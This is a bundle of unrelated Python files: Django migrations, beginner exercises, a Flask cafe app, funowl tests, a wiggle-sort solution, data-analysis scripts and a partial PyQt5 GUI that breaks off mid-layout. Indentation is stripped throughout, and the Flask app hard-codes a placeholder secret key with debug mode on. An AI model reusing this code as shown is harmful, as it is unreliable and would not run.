field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaPeriodT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfGameT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT1L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L5',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L6',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGfPeriodT2L7',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AlterField(
model_name='game',
name='gameClock',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='game',
name='periodClock',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='game',
name='periodNr',
field=models.IntegerField(null=True),
),
]
|
mainString = input("Enter a String with letter 'a' : ")
brokenString = mainString.split("a")
print(brokenString[0] + "a")
i = 1
while i < len(brokenString):
print(brokenString[i])
i = i + 1 |
# Write a function that outputs a word frequency dictionary
# format word: count, string:int
# should accept any text as an argument
def word_frequency(strg):
word_count_dict = dict()
char_count_dict = dict()
for word in strg.split():
word_count_dict[word] = (word_count_dict[word] + 1) if (word_count_dict.get(word,False)) else 1
for char in strg:
char_count_dict[char] = (char_count_dict[char] + 1) if (char_count_dict.get(char,False)) else 1
return (word_count_dict, char_count_dict)
def print_counts(dict):
for key, value in dict.items():
print(key, " : ", value)
def main():
sentence = input("Enter any input string \n")
word_counts, char_counts = word_frequency(sentence)
option = int(input("Please enter an option 1, 2 or 3\n 1. Word Count\n 2. Char Count\n 3. Both\nEnter option here"))
if option==1:
print_counts(word_counts)
elif option==2:
print_counts(char_counts)
else:
print_counts(word_counts)
print_counts(char_counts)
if __name__ == '__main__':
main()
|
list1 = [30, 50, 42, 63, 52]
for i in range(len(list1)):
if list1[i] % 10 == 0:
print(list1[i]) |
from flask import Flask, redirect, render_template, url_for
from flask_sqlalchemy import SQLAlchemy
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, SelectField
from wtforms.validators import DataRequired, URL
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///cafes.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'SECRET_KEY'
db = SQLAlchemy(app)
Bootstrap(app)
def make_bool(ans):
if ans == 'yes':
return True
else:
return False
class Cafe(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(250), unique=True, nullable=False)
map_url = db.Column(db.String(500), nullable=False)
img_url = db.Column(db.String(500), nullable=False)
location = db.Column(db.String(250), nullable=False)
seats = db.Column(db.String(250), nullable=False)
has_toilet = db.Column(db.Boolean, nullable=False)
has_wifi = db.Column(db.Boolean, nullable=False)
has_sockets = db.Column(db.Boolean, nullable=False)
can_take_calls = db.Column(db.Boolean, nullable=False)
coffee_price = db.Column(db.String(250), nullable=True)
def to_dict(self):
return {column.name: getattr(self, column.name) for column in self.__table__.columns}
class CafeForm(FlaskForm):
cafe = StringField('Cafe name', validators=[DataRequired()])
map_url = StringField("Cafe Location on Google Maps(URL)", validators=[DataRequired(), URL(message="Enter a valid URL")])
img_url = StringField("Image URL", validators=[DataRequired(), URL(message="Enter a valid URL")])
location = StringField("Cafe Location", validators=[DataRequired()])
seats = StringField("Number of Seats", validators=[DataRequired()])
has_toilet = SelectField("Wifi Strength Rating",
choices=["yes", "no"],
validators=[DataRequired()])
has_wifi = SelectField("Power Socket Availability",
choices=["yes", "no"],
validators=[DataRequired()])
has_sockets = SelectField("Power Socket Availability",
choices=["yes", "no"],
validators=[DataRequired()])
can_take_calls = SelectField("Power Socket Availability",
choices=["yes", "no"],
validators=[DataRequired()])
coffee_price = StringField("Coffee Price", validators=[DataRequired()])
submit = SubmitField('Submit')
@app.route("/")
def home():
all_cafes = db.session.query(Cafe).all()
num = len(all_cafes)
return render_template("index.html", cafes=all_cafes, num=num)
@app.route('/add', methods=["GET", "POST"])
def add_cafe():
form = CafeForm()
if form.validate_on_submit():
new_cafe = Cafe(
name=form.cafe.data,
map_url= form.map_url.data,
img_url= form.img_url.data,
location=form.location.data,
seats=form.seats.data,
has_toilet=make_bool(form.has_toilet.data),
has_wifi=make_bool(form.has_wifi.data),
has_sockets=make_bool(form.has_sockets.data),
can_take_calls=make_bool(form.can_take_calls.data),
coffee_price=form.coffee_price.data)
db.session.add(new_cafe)
db.session.commit()
return redirect(url_for('home'))
return render_template('add.html', form=form)
if __name__ == '__main__':
app.run(debug=True) |
"""Controller for speaking with teacher"""
from models import teacher
def talk_about_english():
"""Function to speak with teacher"""
english_teacher = teacher.EnglishTeacher()
english_teacher.hello()
english_teacher.ask_user_todo()
english_teacher.thank_you()
|
import unittest
from dataclasses import dataclass
from typing import List
from rdflib import RDFS, RDF, XSD, Namespace, OWL
from funowl import Annotation, AnnotationPropertyDomain, AnnotationPropertyRange, AnnotationAssertion, \
SubAnnotationPropertyOf
from funowl.annotations import Annotatable
from funowl.base.list_support import empty_list_wrapper
from funowl.identifiers import IRI
from funowl.writers import FunctionalWriter
from tests.utils.base import TestBase
a1 = """Annotation(
Annotation( rdfs:comment "Middle 1" )
Annotation(
Annotation( rdfs:comment "Inner" )
rdfs:label "Middle 2"
)
rdfs:comment "Outer"
)"""
a2d = "AnnotationPropertyDomain( rdfs:comment rdfs:Resource )"
a2r = """AnnotationPropertyRange(
Annotation( rdfs:comment "test" )
rdfs:comment xsd:string
)"""
a3 = """Foo(
Annotation( <http://www.w3.org/2000/01/rdf-schema#comment> "Fine" )
<http://example.org/ex#a>
<http://example.org/ex#b>
<http://example.org/ex#c>
)"""
EX = Namespace("http://example.org/ex#")
class AnnotationsTestCase(TestBase):
def test_basic_annotation(self):
self.assertEqual('Annotation( rdfs:label "This is a test" )',
Annotation(RDFS.label, "This is a test").to_functional(self.w).getvalue())
def test_annotation_IRI(self):
self.assertEqual("Annotation( rdfs:label rdfs:Resource )",
Annotation(RDFS.label, RDFS.Resource).to_functional(self.w).getvalue())
def test_annotation_anon(self):
self.assertEqual("Annotation( rdfs:label _:12345 )",
Annotation(RDFS.label, '_:12345').to_functional(self.w).getvalue())
def test_annotation_annotation(self):
self.assertEqual(a1, Annotation(RDFS.comment, "Outer",
[Annotation(RDFS.comment, "Middle 1"),
Annotation(RDFS.label, "Middle 2",
[Annotation(RDFS.comment, "Inner")])]).
to_functional(self.w).getvalue())
def test_annotation_domain_range(self):
self.assertEqual(a2d,
AnnotationPropertyDomain(RDFS.comment, RDFS.Resource).to_functional(self.w).getvalue())
self.w.reset()
self.assertEqual(a2r,
AnnotationPropertyRange(RDFS.comment, XSD.string, [Annotation(RDFS.comment, "test")]).
to_functional(self.w).getvalue())
# AnnotationAssertion( rdfs:comment a:Peter "The father of the Griffin family from Quahog." )
def test_annotation_assertions(self):
self.assertEqual('AnnotationAssertion( rdfs:comment <http://example.org/ex#peter> '
'"The father of the Griffin family from Quahog." )',
AnnotationAssertion("rdfs:comment",
EX.peter, "The father of the Griffin family from Quahog.").
to_functional(self.w).getvalue())
self.w.reset()
self.assertEqual('AnnotationAssertion( <http://example.org/ex#peter> _:abcd rdf:predicate )',
AnnotationAssertion(EX.peter, "_:abcd", RDF.predicate).to_functional(self.w).getvalue())
def test_annotationsubproperty(self):
self.assertEqual('SubAnnotationPropertyOf( <http://example.org/ex#tag> rdfs:label )',
SubAnnotationPropertyOf(EX.tag, RDFS.label).to_functional(self.w).getvalue())
def test_annotatable_constructor(self):
""" A single annotation should get transformed into a list by the annotation constructor """
@dataclass
class Foo(Annotatable):
annotations: List[Annotation] = empty_list_wrapper(Annotation)
a = Annotation(RDFS.comment, "Not a list")
x = Foo(a)
self.assertEqual(x.annotations, [a])
def test_annotatable(self):
@dataclass
class Foo(Annotatable):
props: List[IRI] = empty_list_wrapper(IRI)
annotations: List[Annotation] = empty_list_wrapper(Annotation)
def to_functional(self, w: FunctionalWriter) -> FunctionalWriter:
return self.annots(w, lambda: w.iter(self.props, indent=False))
self.assertEqual("Foo( )", Foo().to_functional(self.w).getvalue())
f = Foo(annotations=[Annotation(RDFS.comment, "t1")])
self.w.reset()
self.assertEqual("""Foo(
Annotation( rdfs:comment "t1" )
)""", f.to_functional(self.w).getvalue())
self.w.reset()
with self.assertRaises(AssertionError):
f.props += [RDF.type, RDFS.label]
f.props.extend([RDF.type, RDFS.label])
f.props.append(OWL.Ontology)
self.assertEqual("""Foo(
Annotation( rdfs:comment "t1" )
rdf:type
rdfs:label
owl:Ontology
)""", f.to_functional(self.w).getvalue())
self.w.reset()
f.annotations[0].annotations.append(Annotation(RDFS.comment, "This is great"))
self.assertEqual("""Foo(
Annotation(
Annotation( rdfs:comment "This is great" )
rdfs:comment "t1"
)
rdf:type
rdfs:label
owl:Ontology
)""", f.to_functional(self.w).getvalue())
if __name__ == '__main__':
unittest.main()
|
# 280. Wiggle Sort
#
# Given an unsorted array nums,
#
# reorder it in-place such that nums[0] <= nums[1] >= nums[2] <= nums[3]....
#
# For example, given nums = [3, 5, 2, 1, 6, 4], one possible answer is [1, 6, 2, 5, 3, 4].
class Solution(object):
def wiggleSort(self, nums):
prev, incr = nums[0], True
for i in range(1, len(nums)):
if (incr and prev < nums[i]) or (not incr and prev > nums[i]):
nums[i - 1] = prev
prev = nums[i]
else:
nums[i-1] = nums[i]
incr = not incr
if __name__ == '__main__':
sol = Solution()
nums = [3, 5, 2, 1, 6, 4]
sol.wiggleSort(nums)
assert nums == [3, 5, 1, 6, 2, 4]
nums = [1,2,2,1,2,1,1,1,1,2,2,2]
sol.wiggleSort(nums)
assert nums == [1,2,1,2,1,2,1,2,1,2,1,2] |
import os
from conans.errors import NotFoundException
from conans.model.manifest import discarded_file
from conans.model.ref import PackageReference
from conans.util.files import load
def get_path(client_cache, conan_ref, package_id, path):
"""
:param client_cache: Conan's client cache
:param conan_ref: Specified reference in the conan get command
:param package_id: Specified package id (can be None)
:param path: Path to a file, subfolder of exports (if only ref) or package (if package_id declared as well)
:return: The real path in the local cache for the specified parameters
"""
if package_id is None: # Get the file in the exported files
folder = client_cache.export(conan_ref)
else:
folder = client_cache.package(PackageReference(conan_ref, package_id))
abs_path = os.path.join(folder, path)
if not os.path.exists(abs_path):
raise NotFoundException("The specified path doesn't exist")
if os.path.isdir(abs_path):
return sorted([path for path in os.listdir(abs_path) if not discarded_file(path)])
else:
return load(abs_path)
|
#!~/anaconda3/bin/python3.6
# encoding: utf-8
"""
@version: 0.0.1
@author: Yongbo Wang
@contact: yongbowin@outlook.com
@file: ToxicClassification - data-info.py
@time: 8/31/18 11:06 PM
@description:
"""
import pandas as pd
import matplotlib.pyplot as plt
class DataStatistics:
def __init__(self):
self.train = pd.read_csv('../input/train.csv')
self.test = pd.read_csv('../input/test.csv')
def freq_statistics(self):
lens = self.train.comment_text.str.len()
print(lens.mean(), lens.std(), lens.max(), lens.min())
plt.hist(lens, bins=40, facecolor='blue', edgecolor='black', alpha=0.7)
plt.xlabel('The length of comments')
plt.ylabel('Frequency')
# plt.title('Histogram of Word frequency distribution')
plt.text(2000, 30000, r'$\mu=' + str(round(lens.mean(), 4)) + r',\ \sigma=' + str(round(lens.std(), 4)) + r'$')
plt.grid(False)
plt.savefig('freq_distribution.jpg')
# plt.show()
def ratio_statistics(self):
label_cols = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
self.train['none'] = 1-self.train[label_cols].max(axis=1)
# print(self.train.describe())
count = 0
for i in list(self.train['none'].values):
if i == 1:
count += 1
print('count:', count)
labels = 'Have labels', 'No labels'
sizes = [len(self.train)-count, count]
explode = (0.2, 0)
fig1, ax1 = plt.subplots()
ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',
shadow=True, startangle=90)
ax1.axis('equal')
# plt.title('The ratio of whether or not there is a label')
plt.savefig('retio_labels.jpg')
# plt.show()
print(len(self.train), len(self.test))
if __name__ == '__main__':
ds = DataStatistics()
ds.freq_statistics()
ds.ratio_statistics() |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 19 14:23:03 2020
@author: zirklej
"""
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import linregress
from random import gauss
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
# generate random points about the curve y=x^2+1
num=100
x=np.linspace(-1,1,num)
y=x**2+1
x_rand=np.array([gauss(0.,0.1) for i in range(num)])
y_rand=np.array([gauss(0.,0.2) for i in range(num)])
xrand=x+x_rand
yrand=y+y_rand
def mine(xrand,yrand,num):
# create coefficient matrix
coef=np.array([[num,np.sum(xrand),np.sum(xrand**2)],
[np.sum(xrand),np.sum(xrand**2),np.sum(xrand**3)],
[np.sum(xrand**2),np.sum(xrand**3),np.sum(xrand**4)]])
# create constant vector
const=np.array([np.sum(yrand),np.sum(xrand*yrand),np.sum(yrand*xrand**2)])
# solve linear system
soln=np.linalg.solve(coef,const)
return soln
def sklearn(xrand,yrand):
xrand=xrand.reshape((-1,1))
# include column for x^2
transformer=PolynomialFeatures(degree=2,include_bias=False)
transformer.fit(xrand)
xrand_=transformer.transform(xrand) # this includes a second col, which is the square of the first col
model=LinearRegression().fit(xrand_,yrand)
a=model.intercept_
b=model.coef_[0]
c=model.coef_[1]
print(a,b,c)
return a,b,c
ymine=mine(xrand,yrand,num)
a,b,c=sklearn(xrand,yrand)
fig1=plt.figure(figsize=(12,6))
ax1=fig1.add_subplot(1,1,1)
ax1.plot(x,a+b*x+c*x**2)
ax1.scatter(xrand,yrand)
ax1.plot(x,ymine[0]+ymine[1]*x+ymine[2]*x**2,color='r')
print("ours: a = {}\n b = {}\n c = {}".format(ymine[0],ymine[1],ymine[2]))
print("scikit-learn: a = {}\n b = {}\n c = {}".format(a,b,c))
|
'''Write a Python function to find the Max of three numbers. '''
def max_two( num1, num2 ):
if num1 > num2:
return num1
return num2
def max_three( num1, num2, num3):
return max_two( num1, max_two( num2, num3 ) )
print(max_three(1, 2, 3))
|
# Generated by Django 3.2.5 on 2021-07-28 04:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user', '0009_alter_city_options'),
]
operations = [
migrations.CreateModel(
name='Ubicacion',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ciudad', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user.city')),
('pais', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user.country')),
],
options={
'verbose_name': 'ubicacion',
'verbose_name_plural': 'ubicaciones',
'ordering': ['pais'],
},
),
]
|
head = ":autocmd FileType python :iabbrev <leader>self "
import sys
try:
fileName = sys.argv[1]
except:
print "please give the file name"
raise Exception
fh = open(fileName, 'r')
lines = fh.readlines()
lines =[x.rstrip() for x in lines]
fh.close()
for i in lines:
head += i
head += "<enter><esc>i"
print head
fh = open("generateVim.txt", 'w')
i = 0
while i < len(head):
j = head[i]
fh.write(j)
i += 1
fh.close()
|
#question 2 - write a regular expression to extract a. email id b. domain name c. time
import re
email='From abc.xyz@pqr.com Mon Dec 29 01:12:15 2016'
#Regex
regex = re.search(r'From (.*)@(.*)\.com (.*)', email, re.M|re.I)
print 'Email ID : '+regex.group(1)+'@'+regex.group(2)+'.com'
print 'Domain Name : ',regex.group(2)
num = re.sub(r'\D', "", email)
print 'Time : '+num[2:4]+':'+num[4:6]+':'+num[6:8]
|
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 16 09:17:12 2018
Versión sin cálculo de reparto
@author: Bruno
"""
import os
import platform
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import qrc_resources
import random
from Funciones_algoritmo_de_calculo import *
import xlwings as xw
import itertools
__version__="1.0.0"
#Variables globales
PageSize=(23000,20000)
streams={}
spliters={}
variables=[]
restricciones={}
critic=[]
flag=False #Flag para indicar si un elemento es de nueva creación o quiere ser modificado
PointSize=10
'''-----------------Graphic object y graphic View-----------------------'''
class graphic_object(QGraphicsPixmapItem):
def __init__(self,parent=None):
super(graphic_object,self).__init__(parent)
self.setFlags(QGraphicsItem.ItemIsSelectable|QGraphicsItem.ItemIsMovable)
def mouseDoubleClickEvent(self,event):
MainWindow.modify_item(form)
class TextItem(QGraphicsTextItem):
def __init__(self,text,position,scene,font=QFont("Times",PointSize)):
super(TextItem,self).__init__(text)
self.setFlags(QGraphicsItem.ItemIsSelectable|QGraphicsItem.ItemIsMovable)
self.setFont(font)
self.setPos(position)
scene.clearSelection()
scene.addItem(self)
self.setSelected(True)
def parentWidget(self):
return self.scene().views()[0]
def mouseDoubleClickEvent(self,event):
dialog=TextItemDlg(self,self.parentWidget())
dialog.exec_()
class GraphicsView(QGraphicsView):
def __init__(self,parent=None):
super(GraphicsView,self).__init__(parent)
self.setDragMode(QGraphicsView.RubberBandDrag)
def wheelEvent(self,event):
factor=1.41**(-event.angleDelta().y()/240)
self.scale(factor,factor)
#####################################################################################
'''--------------------------------------------------------------------------------'''
'''------------------------Dialogs-------------------------------------------------'''
class TextItemDlg(QDialog):
def __init__(self,item=None,position=None,scene=None,parent=None):
super(QDialog,self).__init__(parent)
self.item=item
self.position=position
self.scene=scene
self.editor=QTextEdit()
self.editor.setAcceptRichText(False)
self.editor.setTabChangesFocus(True)
editorLabel=QLabel("&Text: ")
editorLabel.setBuddy(self.editor)
self.fontComboBox=QFontComboBox()
self.fontComboBox.setCurrentFont(QFont("Times",PointSize))
fontLabel=QLabel("&Font:")
fontLabel.setBuddy(self.fontComboBox)
self.fontSpinBox=QSpinBox()
self.fontSpinBox.setAlignment(Qt.AlignRight|Qt.AlignVCenter)
self.fontSpinBox.setRange(6,280)
self.fontSpinBox.setValue(PointSize)
fontSizeLabel=QLabel("&Size:")
fontSizeLabel.setBuddy(self.fontSpinBox)
self.buttonBox=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)
if self.item is not None:
self.editor.setPlainText(self.item.toPlainText())
self.fontComboBox.setCurrentFont(self.item.font())
self.fontSpinBox.setValue(self.item.font().pointSize())
layout=QGridLayout()
layout.addWidget(editorLabel,0,0)
layout.addWidget(self.editor,1,0,1,6)
layout.addWidget(fontLabel,2,0)
layout.addWidget(self.fontComboBox,2,1,1,2)
layout.addWidget(fontSizeLabel,2,3)
layout.addWidget(self.fontSpinBox,2,4,1,2)
layout.addWidget(self.buttonBox,3,0,1,6)
self.setLayout(layout)
'''Slots'''
self.fontComboBox.currentFontChanged.connect(self.updateUi)
self.fontSpinBox.valueChanged.connect(self.updateUi)
self.editor.textChanged.connect(self.updateUi)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.setWindowTitle("Cuadro de Texto - %s" %("Add" if self.item is None else "Edit"))
self.updateUi()
'''Funciones de Text Dialog'''
def updateUi(self):
font=self.fontComboBox.currentFont()
font.setPointSize(self.fontSpinBox.value())
self.editor.document().setDefaultFont(font)
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(not self.editor.toPlainText()=="")
def accept(self):
if self.item is None:
self.item=TextItem("",self.position,self.scene)
font=self.fontComboBox.currentFont()
font.setPointSize(self.fontSpinBox.value())
self.item.setFont(font)
self.item.setPlainText(self.editor.toPlainText())
self.item.update()
QDialog.accept(self)
class settingsWindow(QDialog):
def __init__(self,parent=None):
super(settingsWindow,self).__init__(parent)
self.Tolerancia=QLineEdit("Asigne tolerancia")
self.Iteraciones=QLineEdit("Asigne número máximo de iteraciones")
tol_Label=QLabel("Tolerancia:")
it_Label=QLabel("Máximo número de iteraciones:")
okButton=QPushButton("OK")
cancelButton=QPushButton("Cancel")
buttonLayout=QHBoxLayout()
buttonLayout.addStretch()
buttonLayout.addWidget(okButton)
buttonLayout.addWidget(cancelButton)
layout=QGridLayout()
layout.addWidget(it_Label,0,0)
layout.addWidget(self.Iteraciones,0,1)
layout.addWidget(tol_Label,1,0)
layout.addWidget(self.Tolerancia,1,1)
layout.addLayout(buttonLayout,2,0,1,3)
self.setLayout(layout)
self.setMinimumSize(500,50)
self.setWindowTitle("Parámetros de cálculo")
'''Slots'''
okButton.clicked.connect(self.accept)
cancelButton.clicked.connect(self.reject)
def accept(self):
try:
int(self.Iteraciones.text())
if int(self.Iteraciones.text())<0:
QMessageBox.warning(self,"Error","Las número máximo de iteraciones no puede ser menor que cero")
return
if int(self.Iteraciones.text())==0:
QMessageBox.warning(self,"Error","Las número máximo de iteraciones no puede ser cero")
return
except:
QMessageBox.warning(self,"Error","Las número máximo de iteraciones tiene que ser un número")
return
try:
a=float(self.Tolerancia.text())
if float(self.Tolerancia.text())<0:
QMessageBox.warning(self,"Error","La tolerancia no puede ser menor que cero")
return
if float(self.Tolerancia.text())==0:
QMessageBox.warning(self,"Error","La tolerancia no puede ser cero")
return
except:
QMessageBox.warning(self,"Error","La tolerancia tiene que ser un número")
return
QDialog.accept(self)
class StreamWindow(QDialog):
def __init__(self,parent=None):
super(StreamWindow,self).__init__(parent)
self.nombre=""
self.flujo=""
self.minimo=""
self.maximo=""
nombreLabel=QLabel("Nombre")
flujoLabel=QLabel("Flujo")
minLabel=QLabel("Mínimo")
maxLabel=QLabel("Máximo")
self.casilla=" "
if flag==False:
self.Nombre=QLineEdit("Asigne un nombre a la corriente")
self.Nombre.selectAll()
self.Flujo=QLineEdit("")
self.setWindowTitle("Nueva corriente")
self.minimo=QLineEdit("None")
self.minimo.setReadOnly(True)
self.maximo=QLineEdit("None")
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
self.critic_checkable=QCheckBox("Variable")
self.restriccion_checkable=QCheckBox("Restriccion")
self.fijar_checkable=QCheckBox("Fijar")
else:
item=form.scene.selectedItems()
item=item[0]
self.name=MainWindow.get_itemName(form,item)
self.Nombre=QLineEdit(self.name)
self.Nombre.selectAll()
self.Flujo=QLineEdit(str(streams[self.name].Flujo))
if streams[self.name].editable()!=True and streams[self.name].is_fixed()==False:
self.Flujo.setReadOnly(True)
self.Flujo.setStyleSheet("color:rgb(128,128,128);")
limits=streams[self.name].get_limits()
self.minimo=QLineEdit(str(limits[0]))
self.maximo=QLineEdit(str(limits[1]))
self.critic_checkable=QCheckBox("Variable")
self.restriccion_checkable=QCheckBox("Restriccion")
self.fijar_checkable=QCheckBox("Fijar")
state=streams[self.name].is_critic()
self.setWindowTitle("Corriente")
if state=="variable" or state=="restriccion":
self.Flujo.setReadOnly(True)
self.Flujo.setStyleSheet("color:rgb(128,128,128);")
if state=="variable":
self.critic_checkable.setCheckState(2)
self.casilla="variable"
if state=="restriccion":
self.restriccion_checkable.setCheckState(2)
self.casilla="restriccion"
elif streams[self.name].is_fixed()==True:
self.fijar_checkable.setCheckState(2)
self.casilla="fijar"
self.minimo.setReadOnly(True)
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
else:
self.minimo.setReadOnly(True)
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
okButton=QPushButton("&OK")
cancelButton=QPushButton("Cancel")
buttonLayout=QHBoxLayout()
buttonLayout.addStretch()
buttonLayout.addWidget(okButton)
buttonLayout.addWidget(cancelButton)
layout=QGridLayout()
layout.addWidget(nombreLabel,0,0)
layout.addWidget(self.Nombre,0,1)
layout.addWidget(flujoLabel,1,0)
layout.addWidget(self.Flujo,1,1)
layout.addWidget(self.critic_checkable,2,0)
layout.addWidget(self.restriccion_checkable,2,1)
layout.addWidget(self.fijar_checkable,2,3)
layout.addWidget(minLabel,3,0)
layout.addWidget(self.minimo,3,1)
layout.addWidget(maxLabel,3,2)
layout.addWidget(self.maximo,3,3)
